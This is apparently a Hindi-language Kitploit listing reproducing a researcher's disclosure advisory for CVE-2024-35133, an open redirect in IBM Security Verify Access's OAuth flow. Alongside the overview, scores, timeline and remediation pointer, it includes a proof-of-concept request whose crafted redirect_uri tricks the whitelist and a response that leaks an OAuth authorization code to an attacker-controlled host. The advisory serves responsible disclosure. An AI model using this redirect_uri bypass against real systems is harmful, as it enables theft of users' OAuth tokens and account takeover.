Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub
/
ozozuz
/ibm-security-verify-oauth_token_steal-cve-2024-35133
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

CVE-2024-35133 के लिए सुरक्षा बुलेटिन - PoC के साथ

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

IBM Security Verify Access - OAuth प्रवाह के दौरान ओपन रीडायरेक्ट (CVE-2024-35133)

विषय सूची

  1. अवलोकन
  2. विस्तृत विवरण
  3. प्रूफ ऑफ कॉन्सेप्ट
  4. समाधान
  5. प्रकटीकरण समयरेखा
  6. संदर्भ
  7. श्रेय
  8. कानूनी सूचनाएँ

अवलोकन

संशोधन: 1.0
प्रभाव:
किसी पीड़ित को विशेष रूप से तैयार की गई वेबसाइट पर जाने के लिए प्रेरित करके, एक दूरस्थ हमलावर इस कमजोरी का उपयोग करके प्रदर्शित URL को गलत साबित कर सकता है और उपयोगकर्ता को एक दुर्भावनापूर्ण वेबसाइट पर रीडायरेक्ट कर सकता है। इससे हमलावर अत्यधिक संवेदनशील जानकारी प्राप्त कर सकता है या पीड़ित के विरुद्ध आगे के हमले कर सकता है।

गंभीरता:

  • NIST: उच्च
  • IBM: मध्यम

CVSS स्कोर:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

विक्रेता: IBM

प्रभावित उत्पाद:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

प्रभावित संस्करण: 10.0.0 - 10.0.8

उत्पाद विवरण

IBM Security Verify Access एक पूर्ण प्राधिकरण और नेटवर्क सुरक्षा नीति प्रबंधन समाधान है। यह भौगोलिक रूप से फैले इंट्रानेट और एक्सट्रानेट पर संसाधनों की अंत-से-अंत सुरक्षा प्रदान करता है।

कुछ प्रमुख विशेषताओं में शामिल हैं:

  • प्रमाणीकरण: बिल्ट-इन प्रमाणकों की विस्तृत श्रृंखला और बाहरी प्रमाणकों के लिए समर्थन।
  • प्राधिकरण: संरक्षित संसाधन अनुरोधों के लिए सुरक्षित अनुमति और अस्वीकृति निर्णय।
  • डेटा सुरक्षा और केंद्रीकृत संसाधन प्रबंधन: कॉर्पोरेट फ़ायरवॉल प्रणाली के माध्यम से सार्वजनिक इंटरनेट कनेक्टिविटी का उपयोग करके आंतरिक नेटवर्क-आधारित संसाधनों तक सुरक्षित पहुँच का प्रबंधन करता है।

विस्तृत विवरण

एक क्लाइंट के लिए OAuth प्रवाह के पेनिट्रेशन टेस्ट के दौरान, एक ओपन रीडायरेक्ट कमजोरी की खोज की गई, जिससे OAuth "code" वेरिएबल का रिसाव संभव हुआ।

OAuth प्रवाह के दौरान "redirect_uri" पैरामीटर को सत्यापित करने के लिए जिम्मेदार पार्सर के तर्क को दरकिनार करके (RFC 3986 का लाभ उठाकर), हमलावर IBM Security Verify Access में डोमेन व्हाइटलिस्ट फ़िल्टर में हेरफेर कर सकता है। इसके परिणामस्वरूप हमलावर द्वारा नियंत्रित किसी भी मनमाने डोमेन पर एक ओपन रीडायरेक्ट हुआ। पीड़ित को एक दुर्भावनापूर्ण साइट पर रीडायरेक्ट किया जा सकता है, जबकि डोमेन विश्वसनीय प्रतीत होता है।

इससे OAuth "code" टोकन जैसी संवेदनशील जानकारी का खुलासा हो सकता है या पीड़ित के विरुद्ध आगे के हमले हो सकते हैं।


प्रूफ ऑफ कॉन्सेप्ट

अनुरोध

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

प्रतिक्रिया

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

समाधान

पैच, अपग्रेड या सुझाए गए वर्कअराउंड जानकारी के लिए IBM सुरक्षा बुलेटिन 7166712 देखें।
अधिक विवरण के लिए संदर्भ देखें।


प्रकटीकरण समयरेखा

  • 19/03/2024: सुरक्षा शोधकर्ता (Giulio Garzia) द्वारा कमजोरी की खोज
  • 21/03/2024: IBM Security Verify Access पर निर्भर क्लाइंट के साथ कमजोरी साझा की गई
  • 02/04/2024: IBM को कमजोरी की सूचना दी गई
  • 14/05/2024: IBM द्वारा कमजोरी की पुष्टि
  • 18/07/2024: IBM द्वारा ग्राहक को प्री-रिलीज़ पैच प्रदान किया गया
  • 27/08/2024: IBM द्वारा सुरक्षा बुलेटिन और कमजोरी साझा की गई

संदर्भ

  1. IBM सुरक्षा बुलेटिन CVE-2024-35133
  2. IBM X-Force कमजोरी डेटाबेस
  3. NIST CVE-2024-35133
  4. CWE-178: URL का अनुचित हैंडलिंग

श्रेय

इस कमजोरी की खोज और रिपोर्ट निम्नलिखित द्वारा की गई:

  • Giulio Garzia
    LinkedIn
    GitHub

कानूनी सूचनाएँ

कॉपीराइट (c) 2024 Giulio Garzia "Ozozuz"

इस चेतावनी के इलेक्ट्रॉनिक पुनर्वितरण की अनुमति है। स्पष्ट लिखित सहमति के बिना इसे संपादित नहीं किया जा सकता है। अन्य मीडिया में इस चेतावनी को पुनर्मुद्रित करने की अनुमति के लिए, लेखक से संपर्क करें।

अस्वीकरण: इस सलाहकार में दी गई जानकारी प्रकाशन के समय उपलब्ध आंकड़ों के आधार पर सटीक है। कोई वारंटी प्रदान नहीं की जाती है। इस जानकारी के उपयोग से उत्पन्न प्रत्यक्ष, अप्रत्यक्ष या परिणामी क्षति के लिए न तो लेखक और न ही प्रकाशक उत्तरदायी है।

टूल डाउनलोड करें